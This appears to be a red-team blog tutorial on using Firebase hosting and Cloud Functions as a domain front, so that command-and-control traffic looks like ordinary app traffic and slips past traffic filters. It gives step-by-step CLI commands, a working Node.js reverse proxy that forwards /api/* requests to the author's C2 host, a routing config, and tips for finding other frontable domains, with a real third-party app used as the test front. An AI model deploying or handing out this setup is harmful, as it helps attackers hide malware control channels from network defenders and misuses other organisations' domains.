Firebase Domain Front - Hiding C2 as App traffic

We often see that large organization use firebase for hosting their applications and database. Firebase has a lot of features such as real-time database, hosting, cloud functions, hosting etc. Today we are going to talk about firebase hosting and cloud functions which are used by a lot of mobile applications these days. In our recent project, we were able to hide ourselves as a legit mobile traffic and bypass a lot of traffic filters
Firebase Cloud Functions
Firebase Cloud Functions
Firebase allows an operator to write an applications in Node JS and deploy it using its hosting feature. 
Setting up Firebase Domain Front
So lets start by selecting a app hosted using firebase. In the following case we'll take https://go.auk.eco/ as our selected app.
Step 1: Create an account on https://firebase.google.com
Step 2: Go to Console
Go to Console in Top Right Corner
Step 3: Create a project and give it a name
Create Firebase Project
Set up a project name
Create a Project
Step 4: Open your command prompt and install firebase cli. 
1
npm install -g firebase-tools
Copied!
Step 5: Make a folder and perform firebase cli login. 
1
mkdir awesomedomainfront
2
cd awesomedomainfront
3
firebase login
Copied!
Step 6:  Initiate Hosting
1
firebase init hosting
Copied!
Once you hit the above command you'll be presented with many options. See the following screenshot for responses to the options
Firebase Hosting Init
Step 7: Initiate Cloud functions
1
firebase init functions
Copied!
Again you'll be presented with many options. See the following screenshot for the response to the options
Firebase Functions init
Step 8: Install Express and http-proxy
1
cd functions
2
npm i express --save
3
npm i http-proxy --save
Copied!
Install Express and http-proxy
Step 9: Edit the index.js
Since you are already in the functions folder after saving the npm packages. Lets edit the index.js file in this folder.
index.js
1
const functions = require('firebase-functions');
2
const express = require('express');
3
​
4
const app = express();
5
​
6
var http = require('http'), httpProxy = require('http-proxy');
7
​
8
​
9
var proxy = httpProxy.createProxyServer({secure:false,xfwd:true}); //Setting up X-forwarded for header 
10
​
11
// your C2 must have a URI . In this case I am using /api/" 
12
app.all('/api/*', function(req, res, next){
13
    console.log(req.url);
14
    req.url = "/api/" + req.url.slice(5);
15
	console.log("Req URL:"+req.url);
16
    proxy.web(req, res, {
17
        target: 'https://firebase.redteam.cafe:443/' /* Change it to your domain */
18
    }, function(e) {
19
        console.log(e);
20
    }); 
21
	res.set('Cache-Control', 'no-cache, no-store');
22
});
23
​
24
​
25
exports.app = functions.https.onRequest(app);
26
​
27
// // Create and Deploy Your First Cloud Functions
28
// // https://firebase.google.com/docs/functions/write-firebase-functions
29
//
30
// exports.helloWorld = functions.https.onRequest((request, response) => {
31
//   functions.logger.info("Hello logs!", {structuredData: true});
32
//   response.send("Hello from Firebase!");
33
// });
34
​
Copied!
Step 10: Edit the firebase.json file
Go to the parent folder and edit firebase.json
1
cd ../
Copied!
firebase.json
1
{
2
  "hosting": {
3
	"headers" : [{
4
		"source" : "**/*[email protected](js)",
5
		"headers": [{
6
			"key" : "Cache-Control",
7
			"value" : "no-cache, no-store"
8
			}]
9
		}],
10
    "public": "public",
11
	"rewrites": [{
12
	/* your C2 must have a URI . In this case I am using /api/" */
13
		"source": "/api/**",
14
		"function": "app",
15
		"run":{
16
			"region" : "asia-east2"
17
			}
18
		}],
19
    "ignore": [
20
      "firebase.json",
21
      "**/.*",
22
      "**/node_modules/**"
23
    ]
24
  },
25
  "functions": {
26
  }
27
}
28
​
Copied!
Step 11: Deploy the project
Lets start the deployment of our firebase project
1
firebase deploy
Copied!
Error Message for deploying the project
Modify the plan of project from free plan to Pay as you go plan
Click Modify Plan
Select "Pay as you go" plan
Now lets try the deployment again.
1
firebase deploy
Copied!
Deploy Complete
Final Tests for the Domain Front
Lets check what's hosted on https://firebase.redteam.cafe/api/index.html
Response from firebase.redteam.cafe
Let's check if our app works fine 
Response from amazingdomainfront.web.app
THE FINAL TEST
Lets see if we are able to do Domain Front against a test domain https://go.auk.eco/
Domain front with Test Domain is Successful
How to Find more domain fronts
Hint: Try to find domains whose CNAME ends with *.web.app 
UPDATE (4/5/2021) : Vincent Yiu created a list for domain fronts in the following github repo
​https://github.com/vysecurity/DomainFrontingLists​
Download Source Code 
Source code can be downloaded from my github repository https://github.com/shantanu561993/Awesome_Firebase_DomainFront​
Credits
​Vincent Yiu, Jonathan Cheung​
Connect with me
Twitter: https://twitter.com/shantanukhande​